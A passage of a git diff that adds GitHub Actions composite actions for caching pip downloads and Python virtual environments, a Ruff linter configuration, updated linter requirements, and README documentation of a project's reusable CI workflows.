+ requirements_paths:
+ description: Space separeted list of requirement files. They will be used to compute the hash for the cache key.
+ required: true
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+outputs:
+ cache-hit:
+ description: Whether virtual environment was found in the cache or not.
+ value: ${{ steps.restore_virtual_environment.outputs.cache-hit }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Compute requirements files SHA256 hash
+ id: compute_requirements_files_sha256_hash
+ uses: ./.github/actions/misc/compute_files_hash
+ with:
+ file_paths: ${{ inputs.requirements_paths }}
+
+ - name: Restore virtual environment
+ id: restore_virtual_environment
+ uses: actions/cache/restore@v4
+ with:
+ path: ${{ inputs.virtual_environment_path }}
+ key: ${{ inputs.git_reference }}-venv-${{ steps.compute_requirements_files_sha256_hash.outputs.computed_hash }}
+
+ - name: Activate restored virtual environment
+ if: >
+ steps.restore_virtual_environment.outputs.cache-hit == 'true'
+ uses: ./.github/actions/python_requirements/create_virtualenv
+ with:
+ virtualenv_path: ${{ inputs.virtual_environment_path }}
+ activate_only: true
\ No newline at end of file
diff --git a/.github/actions/python_requirements/save_pip_cache/README.md b/.github/actions/python_requirements/save_pip_cache/README.md
new file mode 100644
index 00000000..e3950a0c
--- /dev/null
+++ b/.github/actions/python_requirements/save_pip_cache/README.md
@@ -0,0 +1,22 @@
+# Composite action save pip cache
+
+This action saves the pip download cache.
+
+Every time a user runs `pip install `, pip downloads the package and all its dependencies.The packages are saved in a directory which, by default, is located at `~/.cache/pip`.
+Saving this cache in GitHub's cache allows us to save time when installing those packages. As a matter of fact, before installing packages, pip's cache can be restored using [**restore_pip_cache**](../restore_pip_cache/README.md) action.
+
+The action is composed of three steps:
+
+1. **Generate random UUID** - This step computes a random UUID, using shell command `uuidgen`, which will be part of the cache key. The uniqueness of the UUID ensures that there will be no collisions between cache keys, which is crucial because **GitHub won't allow the creation of two caches with the same key** (cache update/overwrite **is not supported**).
+2. **Get pip cache directory** - This step retrieves the path to the pip cache. If *custom_pip_cache_path* is not an empty string, it will be used as pip cache path. Otherwise, the pip cache will be computed using `pip cache dir`.
+3. **Save pip cache** - This step performs the heavy lifting of the caching. Using GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) action, the cache is saved with a key composed of:
+ 1. The git reference input, *git_reference*
+ 2. A static part, `pip-cache`
+ 3. The previously computed UUID
+
+## Documentation
+
+### Inputs
+
+* **custom_pip_cache** - Optional - Path to the pip cache. It can be used for setting a custom pip cache path. It defaults to an empty string. In this case, the pip cache path will be computed using `pip cache dir`. More information regarding the previous command is available [here](https://pip.pypa.io/en/stable/cli/pip_cache/#description)
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
diff --git a/.github/actions/python_requirements/save_pip_cache/action.yml b/.github/actions/python_requirements/save_pip_cache/action.yml
new file mode 100644
index 00000000..d98e398d
--- /dev/null
+++ b/.github/actions/python_requirements/save_pip_cache/action.yml
@@ -0,0 +1,36 @@
+name: Composite action save pip cache
+description: Composite action to save pip cache
+inputs:
+ custom_pip_cache_path:
+ description: Path to the pip cache.
+ required: false
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Generate random UUID
+ id: generate_random_uuid
+ run: |
+ random_uuid=$(uuidgen -r)
+ echo "::debug::Random uuid generated is $random_uuid"
+ echo "computed_uuid=$random_uuid" >> $GITHUB_OUTPUT
+ shell: bash
+ - name: Get pip cache directory
+ id: get_pip_cache_directory
+ run: |
+ if [[ -z '${{ inputs.custom_pip_cache_path }}' ]]; then
+ echo "pip_cache_path=$(pip cache dir)" >> $GITHUB_OUTPUT
+ else
+ echo "pip_cache_path=${{ inputs.custom_pip_cache_path }}" >> $GITHUB_OUTPUT
+ fi
+ echo "::debug::The pip cache path is $pip_cache_path"
+ shell: bash
+ - name: Save pip cache
+ uses: actions/cache/save@v4
+ with:
+ path: ${{ steps.get_pip_cache_directory.outputs.pip_cache_path }}
+ key: ${{ inputs.git_reference }}-pip-cache-${{ steps.generate_random_uuid.outputs.computed_uuid }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/save_virtualenv/README.md b/.github/actions/python_requirements/save_virtualenv/README.md
new file mode 100644
index 00000000..19d9ab5f
--- /dev/null
+++ b/.github/actions/python_requirements/save_virtualenv/README.md
@@ -0,0 +1,23 @@
+# Composite action save Python virtual environment
+
+This action saves a Python virtual environment to GitHub's cache.
+
+Combined with [**restore_virtualenv**](../restore_virtualenv/README.md), **it helps save time by avoiding the installation of Python requirements**.
+
+The action is composed of two steps:
+
+1. **Compute requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) to compute a single SHA256 hash of the files described by the *requirements_paths*. The computed SHA256 hash will be part of the cache key.
+2. **Cache virtual environment** - This step does the heavy lifting of saving the virtual environment to GitHub's cache. It uses the GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) action with the following parameters:
+ 1. **path** - A list of files, directories, or paths to cache - set to the virtual environment path input variable *virtual_environment_path*.
+ 2. **key** - An explicit key for a cache entry - set to the combination of three strings:
+ 1. *git_reference*, provided as an input to the action.
+ 2. A static part, `-venv-`
+ 3. The previously computed SHA256 hash of the requirements files.
+
+## Documentation
+
+### Inputs
+
+* **virtual_environment_path** - Optional - Path where the virtual environment is located. It may be used to provide a custom path for the virtual environment. It defaults to `.venv`.
+* **requirements_paths** - Required - A space separated list of requirements file paths. They will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
diff --git a/.github/actions/python_requirements/save_virtualenv/action.yml b/.github/actions/python_requirements/save_virtualenv/action.yml
new file mode 100644
index 00000000..6c6c66c1
--- /dev/null
+++ b/.github/actions/python_requirements/save_virtualenv/action.yml
@@ -0,0 +1,29 @@
+name: Composite action save Python virtual environment
+description: Composite action to save Python virtual environment
+inputs:
+ virtual_environment_path:
+ description: Path to the virtual environment.
+ required: false
+ default: ".venv"
+ requirements_paths:
+ description: Space separeted list of requirements files. They will be used to compute the hash for the cache key.
+ required: true
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Compute requirements files SHA256 hash
+ id: compute_requirements_files_sha256_hash
+ uses: ./.github/actions/misc/compute_files_hash
+ with:
+ file_paths: ${{ inputs.requirements_paths }}
+
+ - name: Cache virtual environment
+ uses: actions/cache/save@v4
+ with:
+ path: ${{ inputs.virtual_environment_path }}
+ key: ${{ inputs.git_reference }}-venv-${{ steps.compute_requirements_files_sha256_hash.outputs.computed_hash }}
\ No newline at end of file
diff --git a/.github/actions/services/action.yml b/.github/actions/services/action.yml
index b814a033..95cf2131 100644
--- a/.github/actions/services/action.yml
+++ b/.github/actions/services/action.yml
@@ -104,6 +104,7 @@ runs:
echo " environment:" >> elastic_search.yml
echo " ES_JAVA_OPTS: -Xms1g -Xmx1g" >> elastic_search.yml
echo " discovery.type: single-node" >> elastic_search.yml
+ echo " xpack.security.enabled: 'false'" >> elastic_search.yml
echo " ports:" >> elastic_search.yml
echo " - ${{ inputs.elasticsearch_port }}:9200" >> elastic_search.yml
echo " healthcheck:" >> elastic_search.yml
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
new file mode 100644
index 00000000..fb6f0ef7
--- /dev/null
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -0,0 +1,90 @@
+# Top level settings
+## Reference: https://docs.astral.sh/ruff/settings/#top-level
+
+extend-exclude = [
+ ".github",
+ ".idea",
+ ".vscode",
+ "**/migrations/*"
+]
+
+include = ["*.py"]
+
+indent-width = 4
+
+line-length = 160
+
+output-format = "full"
+
+respect-gitignore = false
+
+show-fixes = true
+
+target-version = "py312"
+
+# Format settings level
+## Reference: https://docs.astral.sh/ruff/settings/#format
+[format]
+
+docstring-code-format = true
+
+indent-style = "space"
+
+line-ending = "native"
+
+quote-style = "double"
+
+skip-magic-trailing-comma = false
+
+[lint]
+
+select = [
+ "E", # pycodestyle errors - https://docs.astral.sh/ruff/rules/#error-e
+ "W", # pycodestyle warnings - https://docs.astral.sh/ruff/rules/#warning-w
+ "F", # pyflakes - https://docs.astral.sh/ruff/rules/#pyflakes-f
+ "I", # isort - https://docs.astral.sh/ruff/rules/#isort-i
+ "N", # pep8-naming - https://docs.astral.sh/ruff/rules/#pep8-naming-n
+ "UP", # pyupgrade - https://docs.astral.sh/ruff/rules/#pyupgrade-up
+ "B", # flake8-bugbear - https://docs.astral.sh/ruff/rules/#flake8-bugbear-b
+ "C4", # flake8-comprehensions - https://docs.astral.sh/ruff/rules/#flake8-comprehensions-c4
+ "DJ", # flake8-django - https://docs.astral.sh/ruff/rules/#flake8-django-dj
+]
+
+ignore = [
+ # F403: Allow wildcard imports in __init__.py files
+ "F403",
+ # B006/B008: Allow mutable defaults and function calls in defaults for test helpers
+ "B006",
+ "B008",
+ # B017: Allow blind exception in tests
+ "B017",
+ # B023: Allow loop variable in lambda (functional style)
+ "B023",
+ # B904: Allow raise without from (intentional re-raise)
+ "B904",
+ # C401/C408: Allow dict() and generator patterns (style preference)
+ "C401",
+ "C408",
+ # DJ001: Allow null=True on CharField (intentional for optional fields)
+ "DJ001",
+ # DJ008: Allow models without __str__ (legacy models, API-only)
+ "DJ008",
+ # DJ012: Allow existing Django model field ordering
+ "DJ012",
+ # E501: Allow long lines in docstrings
+ "E501",
+ # N801/N802/N803: Allow existing naming conventions (viewType, iocType, X for ML, migration functions)
+ "N801",
+ "N802",
+ "N803",
+ # N804: Allow 'self' in class methods for Django test compatibility
+ "N804",
+ # N806: Allow uppercase variable names for ML conventions (X_train, X_test)
+ "N806",
+ # N818: Allow existing exception naming
+ "N818",
+ # UP008: Allow explicit super() in tests for clarity
+ "UP008",
+ # UP031: Allow old-style % formatting in tests
+ "UP031",
+]
diff --git a/.github/configurations/python_linters/requirements-linters.txt b/.github/configurations/python_linters/requirements-linters.txt
index 8b8a8a20..8110ca60 100644
--- a/.github/configurations/python_linters/requirements-linters.txt
+++ b/.github/configurations/python_linters/requirements-linters.txt
@@ -1,6 +1,13 @@
-black==24.8.0
+autoflake~=2.3.1
+bandit~=1.8.3
+black~=25.1.0
# use fork since main repo is not updated
# see https://github.com/rocioar/flake8-django/pull/134
+# Note: python 3.12 is not supported
flake8-django @ git+https://github.com/terencehonles/flake8-django.git@a6e369e89d275dfd5514f2aa9d091aa36c5ff84b
-flake8==7.1.1
-isort==5.13.2
\ No newline at end of file
+flake8~=7.1.2
+isort~=6.0.1
+pylint-django~=2.6.1
+pylint~=3.3.5
+ruff~=0.12.7
+
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index c075a634..3b93c450 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -20,7 +20,7 @@ Please delete options that are not relevant.
- [ ] I have read and understood the rules about [how to Contribute](https://intelowlproject.github.io/docs/GreedyBear/Contribute/) to this project.
- [ ] The pull request is for the branch `develop`.
- [ ] I have added documentation of the new features.
-- [ ] Linters (`Black`, `Flake`, `Isort`) gave 0 errors. If you have correctly installed [pre-commit](https://intelowlproject.github.io/docs/GreedyBear/Contribute/#how-to-start-setup-project-and-development-instance), it does these checks and adjustments on your behalf.
+- [ ] Linter (`Ruff`) gave 0 errors. If you have correctly installed [pre-commit](https://intelowlproject.github.io/docs/GreedyBear/Contribute/#how-to-start-setup-project-and-development-instance), it does these checks and adjustments on your behalf.
- [ ] I have added tests for the feature/bug I solved. All the tests (new and old ones) gave 0 errors.
- [ ] If changes were made to an existing model/serializer/view, the docs were updated and regenerated (check [CONTRIBUTE.md](https://github.com/intelowlproject/docs/blob/main/docs/GreedyBear/Contribute.md)).
- [ ] If the GUI has been modified:
diff --git a/.github/workflows/README.md b/.github/workflows/README.md
new file mode 100644
index 00000000..258d5a1d
--- /dev/null
+++ b/.github/workflows/README.md
@@ -0,0 +1,217 @@
+# Worflows
+
+## [Reusable detect changes workflow](_detect_changes.yml)
+
+This sub workflow detects and enumerates the changes between two branches.
+
+It is composed of five steps:
+
+1. **Check out PR target branch** - This step checks out the latest commit of the PR target branch for the current repository. This workflow was designed to detect changes when a PR to a target branch was created. Therefore, the latest commit of the target branch must be checked out as the first step. To achieve this, GitHub's [**checkout**](https://github.com/actions/checkout) action is used with the following parameters:
+ 1. **ref** - The branch, tag or SHA to checkout - It is set to `github.base_ref`, which corresponds to the **PR target branch**.
+2. **Check out source branch latest commit** - This step checks out the latest commit of the source branch on top of the previous one. To do so, GitHub's [**checkout**](https://github.com/actions/checkout) action is used with the following parameters:
+ 1. **clean** - Whether to execute `git clean -ffdx && git reset --hard HEAD` before fetching - It is set to false, which means **do not delete untracked files**.
+3. **Generate summary** - This step creates the title for the action summary. As a matter of fact, the detected changes will be reported below the title in the summary section. The step is performed only if one or both *backend_directories* and *frontend_directories* inputs are not empty.
+4. **Generate diffs for backend** - This step detects and enumerates the files that changed between the two branches. This is performed using [`git diff`](https://git-scm.com/docs/git-diff) command. Specifically, the code instructs git to show the changes in the *backend_directories* relative to `origin/` (the target branch). During this process, the [**pathspec**](https://git-scm.com/docs/gitglossary#Documentation/gitglossary.txt-aiddefpathspecapathspec) is used to exclude files or directories specified in the *backend_exclusions* input. The changes are then enumerated and output through the *backend* variable.
+5. **Generate diffs for frontend** - This step follow the same pattern as the **Generate diffs for backend** step but for the frontend directories.
+
+### Documentation
+
+#### Inputs
+
+* **backend_directories** - Optional - Space separated list of backend directories to check for changes. By default, it is set to an empty string.
+* **backend_exclusions** - Optional - Space separated list of backend files or directories to **exclude** when checking for changes. Globs are supported. By default, it is set to an empty string.
+* **frontend_directories** - Optional - Space separated list of frontend directories to check for changes. By default, it is set to an empty string
+* **frontend_exclusions** - Optional - Space separated list of frontend files or directories to **exclude** when checking for changes. Globs are supported. By default, it is set to an empty string.
+* **ubuntu_version** - Optional - The Ubuntu version to run the workflow against. By default, it is set to `latest`.
+
+#### Outputs
+
+* **backend** - The number of backend files that have changed.
+* **frontend** - The number of frontend files that have changed.
+
+## [Reusable node tests workflow](_node.yml)
+
+This sub workflow install node dependencies and run frontend linters and tests.
+
+It is composed of nine steps:
+
+1. **Check out latest commit for current branch** - This step checks out the latest commit for the current branch of the repository. To do so, it uses GitHub's [**checkout**](https://github.com/actions/checkout) action with no parameters.
+2. **Set up Node.js** - This step sets Node.js up downloading binaries and project's dependencies. This is done using the GitHub's [**setup-node**](https://github.com/actions/setup-node) action which also allows to cache and restore the project dependencies. It's used with the following parameters:
+ 1. **node-version** - Node.js version to use - It is set according to *node_version* input variable.
+ 2. **cache** - Which package manager used to install and cache packages - It is set to `npm`.
+ 3. **cache-dependency-path** - Path to the dependency file: `package-lock.json`, `yarn.lock` etc. It is set to `/package-lock.json`, where *working_directory* is the input variable.
+3. **Add dependencies** - This step adds additional dependencies to the `package-lock.json` file. Specifically, these packages are added to the **devDependencies** part of the aforementioned file. Which packages will be added is chosen accordingly to input variables:
+ 1. *use_jest*
+ 2. *use_react*
+ 3. *use_eslint*
+ 4. *use_prettier*
+ 5. *use_stylelint*
+4. **Install packages** - This step install all missing packages from the dependency file in the directory specified by the *working_directory* input variable.
+5. **Run linters** - This step uses [**node_linter**](../actions/node_linter/action.yml) action to run linters against the frontend source code.
+6. **Check packages licenses** - This step uses [**pilosus/action-pip-license-checker**](https://github.com/pilosus/action-pip-license-checker) to check the licenses used by the project requirements.
+7. **Run CodeQL** - This step uses [**codeql**](../actions/codeql/action.yml) action to run CodeQL to discover vulnerabilities across the codebase.
+8. **Run custom command** - This step is performed only if the input variable *custom_command* is not empty. The step simply run the bash command described in the previously mentioned input variable in the working directory specified by the *working_directory* input variable.
+9. **Run jest tests** - This step runs Jest tests if the input variable *use_jest* is set to true. Finally, if *use_coverage* and *upload_coverage* are set to true, a coverage report is generated and uploaded.
+
+### Documentation
+
+#### Inputs
+
+* **node_versions** - Required - An array of Node.js versions to use.
+* **working_directory** - Required - Path to the `package.json` file
+* **check_packages_licenses** - Optional - Whether to check npm packages licenses or not. By default it is set to true.
+* **use_jest** - Optional - Whether to use Jest test suite or not. By default it is set to false.
+* **use_react** - Optional - Whether react is used by the project or not. By default it is set to false.
+* **use_eslint** - Optional - Whether to use ESlint linter or not. By default it is set to true
+* **use_prettier** - Optional - Whether to use Prettier formatter or not. By default it is set to true.
+* **use_stylelint** - Optional - Whether to use Stylelint linter or not. By default it is set to true.
+* **use_coverage** - Optional - Whether to use Coverage or not. To work, it also require *use_jest* to be true. By default it is set to false.
+* **upload_coverage** - Optional - Whether to upload coverage report to GitHub. By default it is set to false
+* **run_codeql** - Optional - Whether to run CodeQL against the codebase. By default it is set to false.
+* **custom_command** - Optional - A custom bash command to be run by the workflow. By default it is set to an empty string.
+* **max_timeout** - Optional - A maximum amount of minutes allowed for the workflow to run. By default it is set to 30.
+* **ubuntu_version** - Optional - The Ubuntu version to run the workflow against. By default it is set to `latest`.
+
+## [Reusable python linter workflow](_python.yml)
+
+This sub workflow runs Python linters and tests against the codebase.
+
+It is composed of one job:
+
+1. **python** - This job is composed of thirty-one steps:
+ 1. **Check out latest commit** - Checks out the latest commit on the current branch of the repository using the GitHub's [**checkout**](https://github.com/actions/checkout) action.
+ 2. **Set up Python** - Sets up Python on the runner machine using GitHub's [**setup-python**](https://github.com/actions/setup-python) action with the following parameter:
+ 1. **python-version** - Which Python version to use - It is set according to the *python_versions* input variable.
+ 3. **Inject stuff to environment** - This step adds a few environment variables to the system's environment. Specifically:
+ 1. If *django_settings_module* is set, **PYTHONPATH** and **DJANGO_SETTINGS_MODULE** will be added to the runner's environment.
+ 2. If *run_codeql* is true, **CODEQL_PYTHON** will be added to the runner's environment.
+ 4. **Restore APT cache related to PR event** - This step will try to restore the APT cache related to the PR event using [**restore_apt_cache**](../actions/apt_requirements/restore_apt_cache/README.md) with the following parameter:
+ 1. **apt_requirements_file_path** - Path to the APT requirements file - It is set to the *packages_path* input variable.
+ 5. **Restore APT cache related to target branch** - This step will try to restore the APT cache related related to the target branch (of the PR) using [**restore_apt_cache**](../actions/apt_requirements/restore_apt_cache/README.md) only if **Restore APT cache related to PR event** produces a cache miss. It is run with the following parameter:
+ 1. **apt_requirements_file_path** - Path to the APT requirements file - It is set to the *packages_path* input variable.
+ 2. **git_reference** - A git reference (name of the branch, reference to the PR) that will be used to build the cache key - It is set to the target branch.
+ 6. **Restore APT repositories** - If both PR event and target branch APT cache restore attempt resulted in a cache miss, the APT repositories list is refreshed using `sudo apt-get update`.
+ 7. **Install APT requirements** - This step installs APT requirements listed in the *packages_path* requirements file. **Since they are not required, recommended packages are not downloaded**.
+ 8. **Save APT cache related to PR event** - When the attempt to restore the APT cache related to the PR event results in a cache miss, the newly populated APT cache is saved to GitHub. This is performed using [**save_apt_cache**](../actions/apt_requirements/save_apt_cache/README.md) action with the following parameter:
+ 1. **apt_requirements_file_path** - Path to the APT requirements file - It is se to the *packages_path* input variable.
+ 9. **Create linter requirements file** - This step creates the linter requirements file using the [**create_linter_requirements_file**](../actions/python_requirements/create_linter_requirements_file/README.md) action.
+ 10. **Create dev requirements file** - This step creates the development requirements file using the [**create_dev_requirements_file**](../actions/python_requirements/create_dev_requirements_file/README.md) action.
+ 11. **Create docs requirement file** - This step creates the documentation requirements file using the [**create_docs_requirements_file**](../actions/python_requirements/create_docs_requirements_file/README.md) action.
+ 12. **Restore Python virtual environment related to PR event** - This step attempts to restore the Python virtual environment for the PR using the [**restore_python_virtualenv**](../actions/python_requirements/restore_virtualenv/README.md) action.
+ 13. **Restore Python virtual environment related to target branch** - If the attempt to restore the Python virtual environment for the PR, result in a cache miss, an attempt to restore the Python virtual environment for the target branch is made using the [**restore_python_virtualenv**](../actions/python_requirements/restore_virtualenv/README.md) action.
+ 14. **Create Python virtual environment** - If both attempts to restore the Python virtual environment for the PR, for the target branch, result in a cache miss, a Python virtual environment is created using the [**create_virtualenv**](../actions/python_requirements/create_virtualenv/README.md) action.
+ 15. **Restore pip cache related to PR event** - If both attempts to restore the Python virtual environment for the PR, for the target branch, result in a cache miss, an attempt to restore the pip cache for the PR event is made using the [**restore_pip_cache**](../actions/python_requirements/restore_pip_cache/README.md) action.
+ 16. **Restore pip cache related to target branch** - If both attempts to restore the Python virtual environment for the PR, for the target branch, as well as the pip cache for the PR, result in a cache miss, an attempt to restore the pip cache for the target branch is made using the [**restore_pip_cache**](../actions/python_requirements/restore_pip_cache/README.md) action.
+ 17. **Install project requirements** - If both attempts to restore the Python virtual environment for the PR event, and the target branch result in a cache miss, project requirements are installed from the working directory specified by the *install_from* input variable.
+ 18. **Install other requirements** - If the attempt to restore the Python virtual environment for the PR event result in a cache miss, developer, linters and documentation requirements are installed from the working directory specified by *working_directory* input variable.
+ 19. **Check requirements licenses** - If the input variable *check_requirements_licenses* is set to true and the attempt to restore the Python virtual environment related to the PR event result in a cache miss, this step performs the requirements licenses check using [**pilosus/action-pip-license-checker**](https://github.com/pilosus/action-pip-license-checker).
+ 20. **Print wrong licenses** - If the output of **Check requirements licenses** is `failure`, the list of licenses for which the check failed will be returned.
+ 21. **Save Python virtual environment related to PR event** - If the attempt to restore the Python virtual environment resulted in a cache miss, the Python virtual environment is saved for the PR event using the [*save_virtualenv*](../actions/python_requirements/save_virtualenv/README.md) action with the following parameter:
+ 1. **requirements_paths** - A space separated list of requirements file paths - It is set to the combination of *requirements_path*, `requirements-linters.txt`, `requirements-dev.txt` and `requirements-docs.txt` joined by spaces.
+ 22. **Save pip cache related to PR event** - If both attempts to restore the Python virtual environment and the pip cache related to the PR resulted in a cache miss, the pip cache is saved for the PR event using the [*save_pip_cache*](../actions/python_requirements/save_pip_cache/README.md) action.
+ 23. **Run linters** - If one of the following input variables: *use_black*, *use_isort*, *use_flake8*, *use_pylint*, *use_bandit* and *use_autoflake* is true, this step executes the linters against the codebase in the working directory specified by the *working_directory* variable.
+ 24. **Run CodeQL** - If the *run_codeql* input variable is true, this step runs CodeQL against the codebase using the [**codeql**](../actions/codeql/action.yml) action in the working directory specified by the *working_directory* variable.
+ 25. **Build Docs** - If the *check_docs_directory* input variable is set, this step executes `rstcheck` to ensure that the documentation in *check_docs_directory* is valid. Finally, the documentation is built using `sphinx`.
+ 26. **Start services** - If one or more of the following input variables: *use_postgres*, *use_elastic_search*, *use_memcached*, *use_redis*, *use_rabbitmq* and *use_mongo* are true, this step creates the Docker container for the service using the [**services**](../actions/services/action.yml) action. Additional parameters, such as *postgres_db* or *elasticsearch_version* can also be provided to the aforementioned action.
+ 27. **Start celery worker** - If the *use_celery* input variable is true, a Celery worker is created for the *celery_app* application. The `celery` command is executed in the working directory specified by the *working_directory* input variable.
+ 28. **Run custom command** - If the *custom_command* input variable is not empty, the command defined by the variable is executed in the working directory specified by the *working_directory* input variable.
+ 29. **Check migrations** - If *check_migrations* is true and *django_settings_module* is not empty, this step will perform a dry run of `django-admin makemigrations` to ensure that the migrations are valid.
+ 30. **Run unittest** - This step runs Python tests against the codebase in the directory described by the *working_directory* input variable. Additionally, according to *tags_for_manual_tests* and *tags_for_slow_tests* variables, some tests will be excluded from the run.
+ 31. **Create coverage output** - If *use_coverage* and *upload_coverage* are set to true, this step produces a coverage report of the codebase and uploads it to GitHub. The *working_directory* input variable is used to determines the directory in which coverage should be run.
+
+### Documentation
+
+#### Inputs
+
+* **python_versions** - Required - Python versions used by this workflow in the form of a JSON array.
+* **ubuntu_version** - Optional - Ubuntu version to run workflow against. By default, it is set to `latest`.
+* **working_directory** - Required - Directory in which to run linters.
+* **requirements_path** - Required - Path to the requirements file of the Python project.
+* **install_from** - Optional - Directory where all installation commands will be run. By default, it is set to `.`.
+* **packages_path** - Optional - Path to the APT requirements file of the Python project. By default, it is set to an empty string.
+* **env** - Optional - A JSON object containing a set of environment variables to be added to the system's environment. By default, it is set to an empty JSON object `{}`.
+* **max_timeout** - Optional - Maximum amount of time (in minutes) the workflow is allowed to run. By default, it is set to `30`.
+* **use_black** - Optional - Whether to use black formatter. By default, it is set to `false`.
+* **use_isort** - Optional - Whether to use isort formatter. By default, it is set to `false`.
+* **use_ruff_formatter** - Optional - Whether to use ruff formatter. By default, it is set to `false`.
+* **use_autoflake** - Optional - Whether to use autoflake linter. By default, it is set to `false`.
+* **use_bandit** - Optional - Whether to use bandit linter. By default, it is set to `false`.
+* **use_flake8** - Optional - Whether to use flake8 linter. By default, it is set to `false`.
+* **use_pylint** - Optional - Whether to use pylint linter. By default, it is set to `false`.
+* **use_ruff_linter** - Optional - Whether to use ruff linter. By default, it is set to `false`.
+* **use_coverage** - Optional - Whether to use coverage. By default, it is set to `false`.
+* **coverage_config_path** - Optional - Path to the coverage configuration file. By default, it is set to `.coveragerc`.
+* **upload_coverage** - Optional - Whether to upload coverage report to GitHub. To work, it needs *use_coverage* to be true. By default, it is set to `false`.
+* **run_codeql** - Optional - Whether to run CodeQL against codebase. By default, it is set to `false`.
+* **use_celery** - Optional - Whether to create a Celery container. By default, it is set to `false`.
+* **use_elastic_search** - Optional - Whether to create an Elasticsearch container. By default, it is set to `false`.
+* **use_memcached** - Optional - Whether to create a Memcached container. By default, it is set to `false`.
+* **use_mongo** - Optional - Whether to create a MongoDB container. By default, it is set to `false`.
+* **use_postgres** - Optional - Whether to create a PostgresDB container. By default, it is set to `false`.
+* **use_rabbitmq** - Optional - Whether to create a RabbitMQ container. By default, it is set to `false`.
+* **use_redis** - Optional - Whether to create a Redis container. By default, it is set to `false`.
+* **celery_app** - Optional - A Celery application name. Requires *use_celery* to be true. By default, it is set to an empty string.
+* **celery_queues** - Optional - A comma separated list of Celery queues. Requires *use_celery* to be true. By default, it is set to `default`.
+* **elasticsearch_version** - Optional - Elasticsearch's container version. By default, it is set to `latest`.
+* **elasticsearch_port** - Optional - Elasticsearch's container exposed port. By default, it is set to `9200`.
+* **memcached_version** - Optional - Mecached's container version. By default, it is set to `latest`.
+* **mongo_version** - Optional - MongoDB's container version. By default, it is set to `latest`.
+* **postgres_db** - Optional - PostgresDB database name. Requires *use_postgres* to be true. By default, it is set to `db`.
+* **postgres_user** - Optional - PostgresDB user name. Requires *use_postgres* to be true. By default, it is set to `user`.
+* **postgres_password** - Optional - PostgresDB password. Requires *use_postgres* to be true. By default, it is set to `password`.
+* **postgres_version** - Optional - PostgresDB's container version. Requires *use_postgres* to be true. By default, it is set to `latest`.
+* **rabbitmq_version** - Optional - RabbitMQ's container version. Requires *use_rabbitmq* to be true. By default, it is set to `latest`.
+* **redis_version** - Optional - Redis' container version. Requires *use_redis* to be true. By default, it is set to `latest`.
+* **django_settings_module** - Optional - Path to the Django settings file. By default, it is set to an empty string.
+* **check_migrations** - Optional - Whether to check that the project's migrations are valid. Requires *django_settings_module* to be set. By default, it is set to `false`.
+* **check_requirements_licenses** - Optional - Whether to check that the requirements license is valid. Requires *django_settings_module* to be set. By default, it is set to `true`.
+* **ignore_requirements_licenses_regex** - Optional - A regex that describes which directories should be ignored when checking the validity of requirements licenses. By default, it is set to `uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*`.
+* **tags_for_slow_tests** - Optional - A space separated list of tags for tests that will only be run on the master/main branch. **Works only for Django projects**. By default, it is set to an `slow`.
+* **tags_for_manual_tests** - Optional - A space separated list of tags for tests that will only be run **manually** (CI will ignore them). **Works only for Django projects**. By default, it is set to `manual`.
+* **custom_command** - Optional - A custom bash command to run. By default, it is set to an empty string.
+* **check_docs_directory** - Optional - Path to the documentation directory in which `rstcheck` will be run to check documentation files. By default, it is set to an empty string.
+* **check_dockerfile** - Optional - Path to a Dockerfile to be checked. **Warning: if set it may significantly increase the action time**. By default, it is set to an empty string.
+
+## [Create APT cache](create_apt_cache.yaml)
+
+This workflow is run in the event of **a push on branches *main*, *master*, *develop*, *dev***. Specifically, it is triggered only when the APT requirements file is updated.
+
+The workflow is composed of a single job:
+
+1. **Create cache for APT dependencies** - This job, as described by its name, creates a cache for APT dependencies and stores it on GitHub. It is composed of four steps:
+ 1. **Check out latest commit on current branch** - This step checks out the latest commit on the current branch of the repository.
+ 2. **Install APT dependencies** - This step refreshes APT repositories and then install the project dependecies. This action is required to produce the APT cache that will be saved later.
+ 3. **Save APT cache** - This step saves APT cache on GitHub. The GitHub's [**save_apt_cache**](../actions/apt_requirements/save_apt_cache/README.md) action is used.
+
+## [Create Python cache](create_python_cache.yaml)
+
+This workflow is run in the event of **a push on branches *main*, *master*, *develop*, *dev***. Specifically, it is triggered only when the Python requirements file is updated.
+
+The workflow is composed of a single job:
+
+1. **Create cache for Python dependencies** - This job, as described by its name, creates a cache for Python dependencies and stores it on GitHub. It is composed of four steps:
+ 1. **Check out latest commit** - This step checks out the latest commit on the current branch for the repository.
+ 2. **Install system dependencies required by Python Packages** - **OPTIONAL** - Sometimes, Python packages require one or more system dependencies. For instance, `python-ldap` Python package requires `libldap2-dev` and `libsasl2-dev`, System dependencies, for a successful installation. This step allows user to install system dependencies required by Python packages.
+ 3. **Set up Python** - This step install Python on the runner.
+ 4. **Set up Python virtual environment** - This step uses [**create_virtualenv**](../actions/python_requirements/create_virtualenv/README.md) action to create a Python virtual environment.
+ 5. **Install Python dependencies** - This step install Python requirements to produce the final virtual environment that will be cached. Also, installing the Python dependencies, creates the pip cache.
